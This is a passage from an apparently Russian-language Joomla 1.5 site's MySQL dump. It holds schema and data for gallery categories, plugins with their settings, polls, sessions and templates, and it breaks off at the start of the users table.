INSERT INTO `jos_phocagallery_categories` VALUES (2,0,62,'Баннера','','banners','','','left','','2014-04-08 10:29:10',1,1,62,'2015-03-19 14:40:45',NULL,2,0,0,1266,'62','62','62','','','',0,'','','','','',NULL,'',''),(3,0,0,'Ситилайты','','citylights','','','left','','2014-04-08 10:30:37',1,1,0,'0000-00-00 00:00:00',NULL,3,0,0,621,'0','-2','-2','','','',0,'','','','','',NULL,'',''),(4,0,0,'Пленки','','plenki','','','left','','2014-04-08 10:30:57',1,1,0,'0000-00-00 00:00:00',NULL,4,0,0,734,'0','-2','-2','','','',0,'','','','','',NULL,'',''),(5,0,0,'Сетки','','setki','','','left','','2014-04-08 10:31:26',1,1,0,'0000-00-00 00:00:00',NULL,5,0,0,686,'0','-2','-2','','','',0,'','','','','',NULL,'',''),(6,0,0,'Фотообои','','fotooboi','','','left','','2014-04-18 13:18:44',1,1,0,'0000-00-00 00:00:00',NULL,6,0,0,1536,'0','-2','-2','','','',0,'','','','','',NULL,'',''),(7,0,0,'Бумага Блюбэк','','bumaga-bluback','','','left','','2014-04-18 13:19:26',1,1,0,'0000-00-00 00:00:00',NULL,7,0,0,726,'0','-2','-2','','','',0,'','','','','',NULL,'',''),(8,0,0,'Картины на холсте','','kartini-na-holste','','','left','','2015-03-19 00:00:00',1,1,62,'2015-03-19 14:40:16',NULL,8,0,0,1346,'62','62','62','','','',0,'','','','','',NULL,'','');
/*!40000 ALTER TABLE `jos_phocagallery_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_phocagallery_comments`
--

DROP TABLE IF EXISTS `jos_phocagallery_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_phocagallery_comments` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `title` varchar(255) NOT NULL DEFAULT '',
  `comment` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_phocagallery_comments`
--

LOCK TABLES `jos_phocagallery_comments` WRITE;
/*!40000 ALTER TABLE `jos_phocagallery_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_phocagallery_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_phocagallery_img_comments`
--

DROP TABLE IF EXISTS `jos_phocagallery_img_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_phocagallery_img_comments` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `title` varchar(255) NOT NULL DEFAULT '',
  `comment` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_phocagallery_img_comments`
--

LOCK TABLES `jos_phocagallery_img_comments` WRITE;
/*!40000 ALTER TABLE `jos_phocagallery_img_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_phocagallery_img_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_phocagallery_img_votes`
--

DROP TABLE IF EXISTS `jos_phocagallery_img_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_phocagallery_img_votes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `rating` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_phocagallery_img_votes`
--

LOCK TABLES `jos_phocagallery_img_votes` WRITE;
/*!40000 ALTER TABLE `jos_phocagallery_img_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_phocagallery_img_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_phocagallery_img_votes_statistics`
--

DROP TABLE IF EXISTS `jos_phocagallery_img_votes_statistics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_phocagallery_img_votes_statistics` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `average` float(8,6) NOT NULL DEFAULT '0.000000',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_phocagallery_img_votes_statistics`
--

LOCK TABLES `jos_phocagallery_img_votes_statistics` WRITE;
/*!40000 ALTER TABLE `jos_phocagallery_img_votes_statistics` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_phocagallery_img_votes_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_phocagallery_user`
--

DROP TABLE IF EXISTS `jos_phocagallery_user`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_phocagallery_user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `userid` int(11) NOT NULL DEFAULT '0',
  `avatar` varchar(40) NOT NULL DEFAULT '',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  PRIMARY KEY (`id`),
  KEY `userid` (`userid`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_phocagallery_user`
--

LOCK TABLES `jos_phocagallery_user` WRITE;
/*!40000 ALTER TABLE `jos_phocagallery_user` DISABLE KEYS */;
INSERT INTO `jos_phocagallery_user` VALUES (1,62,'',1,0,0,'0000-00-00 00:00:00',1,NULL);
/*!40000 ALTER TABLE `jos_phocagallery_user` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_phocagallery_votes`
--

DROP TABLE IF EXISTS `jos_phocagallery_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_phocagallery_votes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `rating` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_phocagallery_votes`
--

LOCK TABLES `jos_phocagallery_votes` WRITE;
/*!40000 ALTER TABLE `jos_phocagallery_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_phocagallery_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_phocagallery_votes_statistics`
--

DROP TABLE IF EXISTS `jos_phocagallery_votes_statistics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_phocagallery_votes_statistics` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `average` float(8,6) NOT NULL DEFAULT '0.000000',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_phocagallery_votes_statistics`
--

LOCK TABLES `jos_phocagallery_votes_statistics` WRITE;
/*!40000 ALTER TABLE `jos_phocagallery_votes_statistics` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_phocagallery_votes_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_plugins`
--

DROP TABLE IF EXISTS `jos_plugins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_plugins` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL DEFAULT '',
  `element` varchar(100) NOT NULL DEFAULT '',
  `folder` varchar(100) NOT NULL DEFAULT '',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(3) NOT NULL DEFAULT '0',
  `iscore` tinyint(3) NOT NULL DEFAULT '0',
  `client_id` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_folder` (`published`,`client_id`,`access`,`folder`)
) ENGINE=MyISAM AUTO_INCREMENT=36 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_plugins`
--

LOCK TABLES `jos_plugins` WRITE;
/*!40000 ALTER TABLE `jos_plugins` DISABLE KEYS */;
INSERT INTO `jos_plugins` VALUES (1,'Авторизация - Joomla','joomla','authentication',0,1,1,1,0,0,'0000-00-00 00:00:00',''),(2,'Авторизация - LDAP','ldap','authentication',0,2,0,1,0,0,'0000-00-00 00:00:00','host=\nport=389\nuse_ldapV3=0\nnegotiate_tls=0\nno_referrals=0\nauth_method=bind\nbase_dn=\nsearch_string=\nusers_dn=\nusername=\npassword=\nldap_fullname=fullName\nldap_email=mail\nldap_uid=uid\n\n'),(3,'Авторизация - GMail','gmail','authentication',0,4,0,0,0,0,'0000-00-00 00:00:00',''),(4,'Авторизация - OpenID','openid','authentication',0,3,0,0,0,0,'0000-00-00 00:00:00',''),(5,'Пользователь - Joomla!','joomla','user',0,0,1,0,0,0,'0000-00-00 00:00:00','autoregister=1\n\n'),(6,'Поиск - Содержимое','content','search',0,1,1,1,0,0,'0000-00-00 00:00:00','search_limit=50\nsearch_content=1\nsearch_uncategorised=1\nsearch_archived=1\n\n'),(7,'Поиск - Контакты','contacts','search',0,3,1,1,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(8,'Поиск - Категории','categories','search',0,4,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(9,'Поиск - Разделы','sections','search',0,5,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(10,'Поиск - Ленты новостей','newsfeeds','search',0,6,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(11,'Поиск - Веб-ссылки','weblinks','search',0,2,1,1,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(12,'Содержимое - Разрыв страницы','pagebreak','content',0,10000,1,1,0,0,'0000-00-00 00:00:00','enabled=1\ntitle=1\nmultipage_toc=1\nshowall=1\n\n'),(13,'Содержимое - Рейтинг','vote','content',0,4,1,1,0,0,'0000-00-00 00:00:00',''),(14,'Содержимое - Маскировка e-mail','emailcloak','content',0,5,1,0,0,0,'0000-00-00 00:00:00','mode=1\n\n'),(15,'Содержимое - Подсветка кода (GeSHi)','geshi','content',0,5,0,0,0,0,'0000-00-00 00:00:00',''),(16,'Содержимое - Загрузка модуля в Материал','loadmodule','content',0,6,1,0,0,0,'0000-00-00 00:00:00','enabled=1\nstyle=0\n\n'),(17,'Содержимое - Навигация по страницам','pagenavigation','content',0,2,1,1,0,0,'0000-00-00 00:00:00','position=1\n\n'),(18,'Редактор - Без редактора','none','editors',0,0,1,1,0,0,'0000-00-00 00:00:00',''),(19,'Редактор - TinyMCE','tinymce','editors',0,0,1,1,0,0,'0000-00-00 00:00:00','mode=extended\nskin=0\ncompressed=0\ncleanup_startup=0\ncleanup_save=2\nentity_encoding=raw\nlang_mode=1\nlang_code=en\ntext_direction=ltr\ncontent_css=1\ncontent_css_custom=\nrelative_urls=1\nnewlines=0\ninvalid_elements=applet\nextended_elements=\ntoolbar=top\ntoolbar_align=left\nhtml_height=550\nhtml_width=750\nelement_path=1\nfonts=1\npaste=1\nsearchreplace=1\ninsertdate=1\nformat_date=%Y-%m-%d\ninserttime=1\nformat_time=%H:%M:%S\ncolors=1\ntable=1\nsmilies=1\nmedia=1\nhr=1\ndirectionality=1\nfullscreen=1\nstyle=1\nlayer=1\nxhtmlxtras=0\nvisualchars=1\nnonbreaking=1\nblockquote=1\ntemplate=0\nadvimage=1\nadvlink=1\nautosave=0\ncontextmenu=1\ninlinepopups=1\nsafari=0\ncustom_plugin=\ncustom_button=\n\n'),(20,'Редактор - XStandard Lite 2.0','xstandard','editors',0,0,0,1,0,0,'0000-00-00 00:00:00',''),(21,'Кнопка редактора - Изображение','image','editors-xtd',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(22,'Кнопка редактора - Разрыв страницы','pagebreak','editors-xtd',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(23,'Кнопка редактора - Подробнее','readmore','editors-xtd',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(24,'XML-RPC - Joomla','joomla','xmlrpc',0,7,0,1,0,0,'0000-00-00 00:00:00',''),(25,'XML-RPC - Blogger API','blogger','xmlrpc',0,7,0,1,0,0,'0000-00-00 00:00:00','catid=1\nsectionid=0\n\n'),(27,'Система - SEF','sef','system',0,1,1,0,0,0,'0000-00-00 00:00:00',''),(28,'Система - Отладка','debug','system',0,2,1,0,0,0,'0000-00-00 00:00:00','queries=1\nmemory=1\nlangauge=1\n\n'),(29,'Система - Поддержка старых расширений (Legacy)','legacy','system',0,3,0,1,0,0,'0000-00-00 00:00:00','route=0\n\n'),(30,'Система - Кэш','cache','system',0,4,0,1,0,0,'0000-00-00 00:00:00','browsercache=0\ncachetime=15\n\n'),(31,'Система - Логи','log','system',0,5,0,1,0,0,'0000-00-00 00:00:00',''),(32,'Система - Запомнить меня','remember','system',0,6,1,1,0,0,'0000-00-00 00:00:00',''),(33,'Система - Поддержка старых ссылок','backlink','system',0,7,0,1,0,0,'0000-00-00 00:00:00',''),(34,'Система - Обновление Mootools','mtupgrade','system',0,8,1,1,0,0,'0000-00-00 00:00:00',''),(35,'Контент - DL JoomSlide','joomslide','content',0,0,1,0,0,62,'2012-01-19 15:02:14','applyAllImages=0\nmaxThumbSize=width\nsize=250\nsmallSize=130\nmediumSize=300\nlargeSize=500\nquality=50\ntumbFormat=jpg\nthumbsDir=images/stories/thumbs/\nshowThumbWhenExpand=0\nresizeImage=0\nthumbBiggerImage=0\ncache=0\ncacheTime=1440\nwrapperColor=white\noutlineType=glossy-dark\nenableSlideShow=1\nslideshowInterval=5000\nKeyListener=0\ncontrolBar=0\nbarOpacity=0.75\nbarHideOnMouse=1\ncaptionText=title\nTextPosition=caption\nnumberPosition=heading\nalignImage=center\nsizeReduction=1\nfadeInOut=1\nrightClick=0\nopenImageEvent=1\ncloseImageEvent=1\ndragByHeading=1\nshowCloseButton=0\ndimming=1\ndimmingColor=black\nshowCredits=1\nurlCredits=1\ncustomCredits=Сделано в DL\ncustomUrl=http://web.studiosdl.com\nshowErrors=0\nforceAspectRatio=3\nchangeAspectRatio=3\ncropArea=6\nuseErrorImage=0\npathErrorImage=plugins/content/joomslide/error.png\nnumberOfImagesToPreload=0\ncustomColors=0\nTumbBorderColor=silver\nTumbBorderColorHover=gray\nHeaderBackground=white\nHeaderTextColor=gray\nImageBorderColor=white\nCaptionBackbroundColor=white\nCaptionTextColor=black\nWrapperColor=white\nOutlineColor=white\nLoadingColor=black\nLoadingBackground=white\nfixedControls=fit\ntransitionDuration=500\nslideshowRepeat=0\nbarWidth=220\nbarFirstPosition=top\nbarSecondPosition=center\ncaptionOverlay=0\ncaptionOverlayOpacity=0.75\ncaptionOverlayWidth=220\ncaptionOverlayHideOnMouse=1\ncaptionOverlayFirstPosition=disabled\ncaptionOverlaySecondPosition=disabled\nmultipleInstances=0\nexpandDuration=500\nexpandSteps=20\nrestoreSteps=20\nanchor=auto\nCloseButtonFirstPosition=top\nCloseButtonSecondPosition=right\ndragSensitivity=20\ndimmingOpacity=0.75\ndimmingDuration=50\nadvancedEfects=0\neasing=easeInBack\neasingClose=linearTween\nforceIncludeHeader=0\nallowFlash=0\nhighslidePath=plugins/content/joomslide/highslide/\nhighslideScript=highslide-with-gallery.packed.js\n\n');
/*!40000 ALTER TABLE `jos_plugins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_poll_data`
--

DROP TABLE IF EXISTS `jos_poll_data`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_poll_data` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `pollid` int(11) NOT NULL DEFAULT '0',
  `text` text NOT NULL,
  `hits` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `pollid` (`pollid`,`text`(1))
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_poll_data`
--

LOCK TABLES `jos_poll_data` WRITE;
/*!40000 ALTER TABLE `jos_poll_data` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_poll_data` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_poll_date`
--

DROP TABLE IF EXISTS `jos_poll_date`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_poll_date` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `vote_id` int(11) NOT NULL DEFAULT '0',
  `poll_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `poll_id` (`poll_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_poll_date`
--

LOCK TABLES `jos_poll_date` WRITE;
/*!40000 ALTER TABLE `jos_poll_date` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_poll_date` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_poll_menu`
--

DROP TABLE IF EXISTS `jos_poll_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_poll_menu` (
  `pollid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`pollid`,`menuid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_poll_menu`
--

LOCK TABLES `jos_poll_menu` WRITE;
/*!40000 ALTER TABLE `jos_poll_menu` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_poll_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_polls`
--

DROP TABLE IF EXISTS `jos_polls`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_polls` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `voters` int(9) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '0',
  `lag` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_polls`
--

LOCK TABLES `jos_polls` WRITE;
/*!40000 ALTER TABLE `jos_polls` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_polls` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_sections`
--

DROP TABLE IF EXISTS `jos_sections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_sections` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` text NOT NULL,
  `scope` varchar(50) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_scope` (`scope`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_sections`
--

LOCK TABLES `jos_sections` WRITE;
/*!40000 ALTER TABLE `jos_sections` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_sections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_session`
--

DROP TABLE IF EXISTS `jos_session`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_session` (
  `username` varchar(150) DEFAULT '',
  `time` varchar(14) DEFAULT '',
  `session_id` varchar(200) NOT NULL DEFAULT '0',
  `guest` tinyint(4) DEFAULT '1',
  `userid` int(11) DEFAULT '0',
  `usertype` varchar(50) DEFAULT '',
  `gid` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `data` longtext,
  PRIMARY KEY (`session_id`(64)),
  KEY `whosonline` (`guest`,`usertype`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_session`
--

LOCK TABLES `jos_session` WRITE;
/*!40000 ALTER TABLE `jos_session` DISABLE KEYS */;
INSERT INTO `jos_session` VALUES ('','1449653144','ogk0adjq6pradtcja02naempo6',1,0,'',0,0,'__default|a:8:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1449653144;s:18:\"session.timer.last\";i:1449653144;s:17:\"session.timer.now\";i:1449653144;s:24:\"session.client.forwarded\";s:13:\"77.120.137.35\";s:22:\"session.client.browser\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0\";s:8:\"registry\";O:9:\"JRegistry\":3:{s:17:\"_defaultNameSpace\";s:7:\"session\";s:9:\"_registry\";a:1:{s:7:\"session\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:4:\"user\";O:5:\"JUser\":19:{s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:3:\"gid\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:3:\"aid\";i:0;s:5:\"guest\";i:1;s:7:\"_params\";O:10:\"JParameter\":7:{s:4:\"_raw\";s:0:\"\";s:4:\"_xml\";N;s:9:\"_elements\";a:0:{}s:12:\"_elementPath\";a:1:{i:0;s:81:\"/var/www/dlstudio/data/www/ekv.workdl.org/libraries/joomla/html/parameter/element\";}s:17:\"_defaultNameSpace\";s:8:\"_default\";s:9:\"_registry\";a:1:{s:8:\"_default\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:9:\"_errorMsg\";N;s:7:\"_errors\";a:0:{}}}'),('','1449653626','1nv7s077hiqrcgvut34ukruc40',1,0,'',0,0,'__default|a:8:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1449653626;s:18:\"session.timer.last\";i:1449653626;s:17:\"session.timer.now\";i:1449653626;s:24:\"session.client.forwarded\";s:13:\"77.120.137.35\";s:22:\"session.client.browser\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36\";s:8:\"registry\";O:9:\"JRegistry\":3:{s:17:\"_defaultNameSpace\";s:7:\"session\";s:9:\"_registry\";a:1:{s:7:\"session\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:4:\"user\";O:5:\"JUser\":19:{s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:3:\"gid\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:3:\"aid\";i:0;s:5:\"guest\";i:1;s:7:\"_params\";O:10:\"JParameter\":7:{s:4:\"_raw\";s:0:\"\";s:4:\"_xml\";N;s:9:\"_elements\";a:0:{}s:12:\"_elementPath\";a:1:{i:0;s:81:\"/var/www/dlstudio/data/www/ekv.workdl.org/libraries/joomla/html/parameter/element\";}s:17:\"_defaultNameSpace\";s:8:\"_default\";s:9:\"_registry\";a:1:{s:8:\"_default\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:9:\"_errorMsg\";N;s:7:\"_errors\";a:0:{}}}');
/*!40000 ALTER TABLE `jos_session` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_stats_agents`
--

DROP TABLE IF EXISTS `jos_stats_agents`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_stats_agents` (
  `agent` varchar(255) NOT NULL DEFAULT '',
  `type` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `hits` int(11) unsigned NOT NULL DEFAULT '1'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_stats_agents`
--

LOCK TABLES `jos_stats_agents` WRITE;
/*!40000 ALTER TABLE `jos_stats_agents` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_stats_agents` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_templates_menu`
--

DROP TABLE IF EXISTS `jos_templates_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_templates_menu` (
  `template` varchar(255) NOT NULL DEFAULT '',
  `menuid` int(11) NOT NULL DEFAULT '0',
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`menuid`,`client_id`,`template`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_templates_menu`
--

LOCK TABLES `jos_templates_menu` WRITE;
/*!40000 ALTER TABLE `jos_templates_menu` DISABLE KEYS */;
INSERT INTO `jos_templates_menu` VALUES ('gk_ilife',0,0),('khepri',0,1);
/*!40000 ALTER TABLE `jos_templates_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_users`
--

DROP TABLE IF EXISTS `jos_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
